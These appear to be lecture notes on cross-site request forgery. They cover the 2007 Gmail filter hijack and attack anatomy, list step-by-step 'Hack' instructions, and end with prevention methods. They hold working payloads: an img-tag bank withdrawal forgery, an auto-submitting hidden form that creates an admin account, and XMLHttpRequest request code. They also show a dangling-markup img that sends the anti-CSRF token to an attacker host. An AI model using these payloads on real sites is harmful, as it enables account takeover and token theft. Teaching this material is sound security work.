05

  • Gmail, late 2007

    While being logged into Gmail, if the user visited a malicious site, the site could generate a request to Gmail that Gmail treated as part of its on going session with the victim.

    A web attacker exploited this CSRF vulnerability to inject an email filter into David Airey's Gmail account, by causing the malicious page to perform a multipart/form-data POST to one of the Gmail interfaces.

    This filter would forward all the e-mails to attackers email.

    Unfortunately the attacker gained access to davidairey.com as Airey's domain registrar used email authentication, leading to significant inconvenience and financial loss. (boring write-up!!)

    🔗 http://www.davidairey.com/google-gmail-security-hijack/

    Example - Gmail

    when a Gmail user visited a malicious site, The malicious site could generate a request to Gmail that Gmail treated as part of its ongoing session with the victima web attacker exploited this CSRF vulnerability to inject an email filter into David Airey’s Gmail account. This filter forwarded all of David Airey’s email to the attacker’s email address, the attacker assumed control of davidairey.com because Airey’s domain registrar used email authentication,leading to significant inconvenience and financial loss.

    🔗 http://www.davidairey.com/google-gmail-security-hijack/
    🔗 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

    CSRF

    an attacker tricks a victim into accessing a website or clicking a URL link that makes malicious ( unauthorized) requests. The CSRF attack uses the identity and privileges of the victim in order to perform any actions desired by the attacker. User must be authenticated with the target website.

    Example 1

    In a chat forum, an attacker posts a message which contains an HTML image element the source of the image contains a link which performs an action on a victim’s bank website account,

    <img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=Fred">

    prevention method: allow only HTTP POST requests
    BUT: this can be easily bypassed

    Example 2

    A form to set up a new user (or some other action) Which is triggered by a POST request:
    realname=daf&username=daf&userrole=admin&password=letme1n&confirmpassword=letme1n

  • A Form to Set Up a New User

    Attacker makes a web page that makes a cross domain request to a vulnerable application to carry out a privileged action

    <html>
<body>
<form action=”https://a.com/auth/390/NewUser.ashx” method=”POST”>
<input type=”hidden” name=”realname” value=”daf”>
<input type=”hidden” name=”username” value=”daf”>
<input type=”hidden” name=”userrole” value=”admin”>
<input type=”hidden” name=”password” value=”letme1n”>
<input type=”hidden” name=”confirmpassword” value=”letme1n”>
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

    This can be triggered from the attacker's (innocent looking) web page

    <iframe src="http://www.vulnweb.com/updateif.php" style="display:none"></iframe>

    This loads another page of the attacker’s website. This happens automatically every time a user accesses this website.

    When the user's browser submits the form, it automatically adds the user's cookies for the target domain and the application processes the resulting request. The particular operation will be performed for any user that accesses the attacker’s website. In case the particular user has an account in the target website and is logged in, then the user’s profile information will be updated with the ones of the attacker.

    Cross Site Request Forgery

    Allows an attacker to take arbitrary actions as the victim against a web site. A malicious site instructs a victim’s browser to send a request to an honest site, as if the request were part of the victim’s interaction with the honest site, leveraging the victim’s network connectivity and the browser’s state, such as cookies, to disrupt the integrity of the victim’s session with the honest site.

    Browser Security

    Browsers prevent cross-domain read access to data. Example: http://www.contoso.com cannot read http://www.microsoft.com Cross-domain form submissions are allowed. CSRF Attack - Attacker coerces victim to submit attacker’s form data to the victim’s web server. (Cross-site form submission)

  • Anatomy

    Step 1: Attacker creates a web page.
    Step 2: Victim browses to attacker’s page.
    Step 3: Page automatically submits a request to a vulnerable application (as the victim).
    Step 4: Site authenticates request as coming from the victim.

    Result: Attacker’s form data is accepted by server since it was sent from legitimate user.

    3 key features

    The request performs a privileged action. The application relies solely on HTTP cookies for tracking sessions. No session-related tokens are transmitted elsewhere within the request. Attacker knows all parameters required to perform the action.

    Hack

    1. Identify a function that can be used to perform some sensitive action on behalf of an unwitting user, that relies solely on cookies for tracking user sessions, that employs request parameters that can attacker can fully determine in advance.

    2. Create an HTML page that issues the desired request without any user interaction.

    3. For GET requests you can place an img tag with the src attribute the the vulnerable url.

    4. For post requests you can create a form that contains hidden fields for all the relevant parameters required for the attack and that has its target set the vulnerable url.

    5. While logged in to the application user the same browser to load you craget HTML page. Verify that the desired action is carried out without application

    Execution - HTML Methods

    IMG SRC
  <img src="http://host/?command">
 
SCRIPT SRC
  <script src="http://host/?command">
 
IFRAME SRC
  <iframe src="http://host/?command">

  • Execution JavaScript Methods

    'Image' Object
  <script>
  var foo = new Image();
  foo.src = "http://host/?command";
  </script>

'XMLHTTP' Object
  IE
  <script>
  var post_data = 'name=value';
  var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  xmlhttp.open("POST", 'http://url/path/file.ext', true);
  xmlhttp.onreadystatechange = function () { 
  if (xmlhttp.readyState == 4) 
  { 
  alert(xmlhttp.responseText);
  } 
  }; 
  xmlhttp.send(post_data);
  </script>
  
  Mozilla
  <script>
  var post_data = 'name=value';
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.open("POST", 		'http://url/path/file.ext', true);
  xmlhttp.onreadystatechange = function () {
  if (xmlhttp.readyState == 4){
  	alert(xmlhttp.responseText);
   }
  };
  xmlhttp.send(post_data);
  </script>

  • Prevention

    Validating a secret token

    Include a secret token with each request and to validate that the received token is correctly bound to the user's session.

    Validating custom header

    Set a custom header via XMLHttpRequest and validating that header before state modifying requests. the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest. You can add your own HTTP headers to any request the application makes

    Validating the HTTP Referer header

    Accept requests only from trusted sources by verifying the referer header. BUT: referer header is not required, can also be configured.

    Capturing Data Using HTML

    Application allows attacker to insert some HTML into response that is viewed by other users.

    <img src='http://mdattacker.net/capture?html

    Note:
    The single quote isn't closed
    The <img> tag isn't closed
    The text following insertion is taken as part of the URL (until the next single quote).
    A request to the attacker transmits the anti-CSRF token.
    Block or encode <>

  • Summary

    CSRF exploits the trust that a site has in a user's browser unlike the trust a user has for a particular site.

    Browser's security policy allows web sites to send HTTP requests to any network address.

    This vulnerability would allow the attacker to control content rendered by the browser.

    The attacker could send requests to other machines behind the firewall using the user's browser.

    Requests sent via the browser's network stack typically include browser state such as cookies, client certificates or basic authentication headers.